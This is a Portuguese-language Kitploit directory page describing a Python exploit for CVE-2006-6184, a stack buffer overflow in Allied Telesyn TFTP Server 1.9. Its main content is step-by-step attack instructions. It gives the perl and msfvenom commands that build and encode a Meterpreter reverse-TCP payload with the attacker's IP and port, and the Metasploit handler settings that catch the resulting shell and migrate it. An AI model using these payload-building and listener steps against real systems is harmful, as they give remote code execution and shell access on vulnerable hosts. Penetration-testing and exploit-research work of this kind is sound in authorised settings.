Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2006-6184 — This is a python-based standalone exploit for CVE-2006-6184. This exploit triggers a stack-based buffer overflows in Allied Telesyn TFTP Server (AT-TFTP) 1.9, and possibly earlier, allow remote attackers to cause a denial of service or execute arbitrary code. | Kitploit
Ferramentas/GitHubGitHub/shauntdergrigorian
/
cve-2006-6184
Payload GenerationVulnerability AnalysisExploitationPenetration TestingRemote Access ToolBinary Exploitation
GitHubshauntdergrigorian/cve-2006-6184

cve-2006-6184

This is a python-based standalone exploit for CVE-2006-6184. This exploit triggers a stack-based buffer overflows in Allied Telesyn TFTP Server (AT-TFTP) 1.9, and possibly earlier, allow remote attackers to cause a denial of service or execute arbitrary code.

Ver Repositório
117há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2006-6184

Este é um exploit autônomo baseado em Python para CVE-2006-6184. Este exploit aciona um estouro de buffer baseado em pilha no Allied Telesyn TFTP Server (AT-TFTP) 1.9, e possivelmente versões anteriores, permitindo que invasores remotos causem uma negação de serviço ou executem código arbitrário.

Instruções (Atualizadas para 2020)

O payload deve ser personalizado para incluir seu próprio endereço IP e porta de escuta, então você precisará gerá-lo manualmente. Para isso, use os seguintes passos:

1.) Execute o seguinte comando para criar um arquivo hex da quantidade que precisa ser subtraída do ponteiro de pilha (3500):

root@kitploit:~
perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj

2.) Em seguida, use o seguinte comando para criar um payload de shell meterpreter encadeado:

root@kitploit:~
msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=[your IP] LPORT=[your port] R > payload

3.) Então, combine os dois arquivos que você acabou de criar.

root@kitploit:~
cat stackadj payload > shellcode

4.) Finalmente, vamos eliminar os caracteres ruins.

root@kitploit:~
msfvenom -p generic/custom PAYLOADFILE=./shellcode -b "\x00" -e x86/shikata_ga_nai -f python

Insira a saída como o valor da variável "payload". Pode ser necessário executar este exploit algumas vezes para que funcione.

Listener do Metasploit

  1. use exploit/multi/handler
  2. set PAYLOAD windows/meterpreter/reverse_nonx_tcp
  3. set ExitOnSession false
  4. set AutoRunScript post/windows/manage/migrate
  5. exploit -j
Baixar ferramenta